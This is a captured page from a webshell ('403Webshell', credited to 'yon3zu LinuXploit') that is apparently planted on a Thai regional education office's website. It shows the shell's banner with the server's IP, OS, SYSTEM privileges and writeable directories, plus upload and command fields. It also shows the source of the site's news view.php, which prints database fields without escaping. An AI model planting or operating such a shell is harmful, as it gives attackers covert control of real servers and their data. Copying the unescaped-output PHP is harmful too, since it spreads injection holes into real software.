403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/news/cooprat/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/news/cooprat/view.php
<?php include("db.php");
include("header.php");
$id = $mysqli->escape_string($_GET['id']);
$mysqli->query("UPDATE sc_news SET views=views+1 WHERE id='$id'");
if(!isset($_SESSION['username'])){
}else{ 
$username1 = $_SESSION['username'];
$user1 = $mysqli->query("SELECT * FROM users WHERE username='$username1' LIMIT 1");
$userrow1 = mysqli_fetch_array($user1);
}
$story = $mysqli->query("SELECT * FROM sc_news WHERE id='$id' LIMIT 1");
$storyrow = mysqli_fetch_array($story);

	$title = $storyrow['title'];
	$detail = $storyrow['detail'];
	$uid = $storyrow['uid'];	
	$file_name = $storyrow['file_name'];	
	$date_news = $storyrow['date_news'];	
	$views = $storyrow['views'];
	
$user = $mysqli->query("SELECT * FROM users WHERE id='$uid' LIMIT 1");
$userrow = mysqli_fetch_array($user);
?>

<!DOCTYPE HTML>
<html>
<head>
<?php require 'head.php';?>

  <link href="bootstrap/css/bootstrap.min.css" rel="stylesheet">
  <link href="bootstrap/css/style.css" rel="stylesheet" >
  <link href="bootstrap/icon/css/font-awesome.min.css" rel="stylesheet" >
  <script src="bootstrap/js/jquery.min.js"></script>
  <script src="bootstrap/js/bootstrap.min.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title><?php echo $storyrow['title'];?></title>
<link rel="canonical" content="https://www.facebook.com/sharer.php?u=https://web.sesao8.go.th/news/cooprat/view.php?id=<?php echo $storyrow['id'];?>" />
<meta property='og:type' content='article'/>
<meta property='og:title' content="<?php echo $storyrow['title'];?>" />
<meta property="og:image" content="https://web.sesao8.go.th/news/cooprat/images/logo.png" />
<meta property="og:type" content="website"/>
<meta property="og:site_name" content="myweb"/>
<meta property="og:url" content="https://web.sesao8.go.th/news/cooprat/view.php?id=<?php echo $storyrow['id'];?>" >

<link href="css/style.css" rel="stylesheet" type="text/css">

<link rel="stylesheet" type="text/css" media="all" href="css/inland-forest.css">
<link href="css/bootstrap1.css" rel="stylesheet">
		<script>
			$(document).ready(function(){
				//Examples of how to assign the Colorbox event to elements
				$(".group1").colorbox({rel:'group1'});
				$(".group2").colorbox({rel:'group2', transition:"fade"});
				$(".group3").colorbox({rel:'group3', transition:"none", width:"75%", height:"75%"});
				$(".group4").colorbox({rel:'group4', slideshow:true});
				$(".ajax").colorbox();
				$(".youtube").colorbox({iframe:true, innerWidth:640, innerHeight:390});
				$(".vimeo").colorbox({iframe:true, innerWidth:500, innerHeight:409});
				$(".iframe").colorbox({iframe:true, width:"80%", height:"80%"});
				$(".inline").colorbox({inline:true, width:"50%"});
				$(".callbacks").colorbox({
					onOpen:function(){ alert('onOpen: colorbox is about to open'); },
					onLoad:function(){ alert('onLoad: colorbox has started to load the targeted content'); },
					onComplete:function(){ alert('onComplete: colorbox has displayed the loaded content'); },
					onCleanup:function(){ alert('onCleanup: colorbox has begun the close process'); },
					onClosed:function(){ alert('onClosed: colorbox has completely closed'); }
				});

				$('.non-retina').colorbox({rel:'group5', transition:'none'})
				$('.retina').colorbox({rel:'group5', transition:'none', retinaImage:true, retinaUrl:true});
				
				//Example of preserving a JavaScript event for inline calls.
				$("#click").click(function(){ 
					$('#click').css({"background-color":"#f00", "color":"#fff", "cursor":"inherit"}).text("Open this window again and this message will still be here.");
					return false;
				});
			});
		</script>

</head>

<body>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/th_TH/sdk.js#xfbml=1&appId=142536932596593&version=v2.0";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>

<style type="text/css">
<!--
#Layer1 {
	position:absolute;
	left:25px;
	top:10px;
	width:100px;
	height:99px;
	z-index:1;
}
@font-face {  
  
    font-family: 'ThangLuang';  
  /* ใส่ชื่อ Font */  
    src: url('css/ThangLuang.eot');  
  /* ใส่ URL ที่เก็บไฟล์ Font ที่เป็นนามสกุล .EOT (หลักการเหมือนแทรกรูปภาพธรรมดาๆ ครับ) */  
    src: local('myfont'), url('css/ThangLuang.ttf') format('truetype');  
 /* ใส่ URL ที่เก็บไฟล์ Font ที่เป็นนามสกุล .TTF (หลักการเหมือนแทรกรูปภาพธรรมดาๆ ครับ) */  
    font-weight: normal;  
    font-style: normal;
  
}  
  
@font-face {  
  
    font-family: 'THSarabun';  /* ใส่ชื่อ Font */  
    src: url('css/THSarabun.eot');  
  /* ใส่ URL ที่เก็บไฟล์ Font ที่เป็นนามสกุล .EOT (หลักการเหมือนแทรกรูปภาพธรรมดาๆ ครับ) */  
    src: local('myfont'), url('css/THSarabun.ttf') format('truetype');  
  /* ใส่ URL ที่เก็บไฟล์ Font ที่เป็นนามสกุล .TTF (หลักการเหมือนแทรกรูปภาพธรรมดาๆ ครับ) */  
    font-weight: normal;  
    font-style: normal;  
  
}  
  
.myfont1  
 {  
  
    font-family:'ThangLuang';  
		text-shadow: #FF66FF 0.05em 0.05em 0.05em;
	color: white;
 /* ตั้งชื่อรูปแบบ Font ไว้เรียกใช้งาน */  
}  
.myfont2  
 {  
  
    font-family:'THSarabun'; 
		text-shadow: #FF66FF 0.04em 0.03em 0.03em;
 
 /* ตั้งชื่อรูปแบบ Font ไว้เรียกใช้งาน */  
}  



</style>
<div id="fb-root"></div>
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/th_TH/sdk.js#xfbml=1&version=v2.3&appId=142536932596593";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<div id="wrapper960" >
<table width="900" border="0" align="center">
<tr>
<td><center><font style="font-size:24px"><?php echo $storyrow['title'];?></font></center><br>
<div style="font-size:16px;">&nbsp;&nbsp;<?php echo $detail;?></div>


<?php
$userid = $storyrow['uid'];
$user = $mysqli->query("SELECT * FROM users WHERE id='$userid' LIMIT 1");
$userrow = mysqli_fetch_array($user);
?>
<?php 

?>

  <?php 
if ($file_name=="" or $file_name=="0") { echo ""; } else 
{ 
$rest = substr("$file_name", -3);
if ($rest=="rar" or $rest=="zip") { echo "";} else {
echo "<div class='box'>";


echo "
<iframe src='https://docs.google.com/gview?url=https://web.sesao8.go.th/news/cooprat/schoolfile/$file_name&amp;embedded=true' frameborder='0'  height='700' style='WIDTH: 100%'></iframe></center></div>"; }}
?><br>
</td>
</tr>
  <tr>
    <td></td>
  </tr>
</table>
<div class="story-box">

              <?php			  
		if  ($file_name == 0 or $file_name == "") {
		
  
			}else {
			if ($rest=="rar" or $rest=="zip") { echo "<img src='images/winrar.png' width='22'>";} elseif ($rest=="doc" or $rest=="ocx") { 
			echo "<img src='images/docx.png' width='22'>"; } elseif ($rest=="pdf"){echo "<img src='images/pdf.png' width='22'>"; }
			
			echo  " <a href='schoolfile/$file_name' target=\"_blank\"><button type='button' class='btn btn-info'>
			<span class='glyphicon glyphicon-cloud-download'></span>ดาวน์โหลดไฟล์</button></a>";
			}
		
?>
         
<table width="100%" border="0" cellpadding="2">
<tr><td align="right"> <div class="fb-share-button" data-type="button_count" align="right"></div> </td></tr>
  <tr>
    <td bgcolor="#F1E7D7"><div align="center"><img src="images/shadow.png">
    </div>
     <center> <p>เขียนโดย <?php echo $userrow['ppost'];?> <?php echo $userrow['school'];?> เปิดอ่าน <?php echo $storyrow['views'];?> ครั้ง  เขียนเมื่อ <?php echo $storyrow['date_news'];?></p></center>
	
	</td>
  </tr>
</table>
<div class="fb-comments" data-href="https://web.sesao8.go.th/news/cooprat/view.php?id=<?php echo $storyrow['id'];?>" data-width="750" data-numposts="5" data-colorscheme="light"></div>

<div id="content" class="clearfix shadow"><br>
</div>
<style type="text/css">
<!--
.style39 {
	color: #FFFFFF;
	font-size: 14px;
}
-->
</style>

<center>
<div class="row">
		<div class="col-xs-2" align="right">
		</div>
		<div class="col-xs-8" align="center">
		
		</div>
		<div class="col-xs-2" align="right">
			<img src="images/qrcode.png" height="120">
		</div>
</div>
</center>
<div id="footer" class="shadow">
		<p align="center">
		  © 2015 สำนักงานเขตพื้นที่การศึกษามัธยมศึกษาราชบุรี<br>
เว็บไซต์ https://www.sesao8.go.th<br></p>
</div>


</div></div></div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit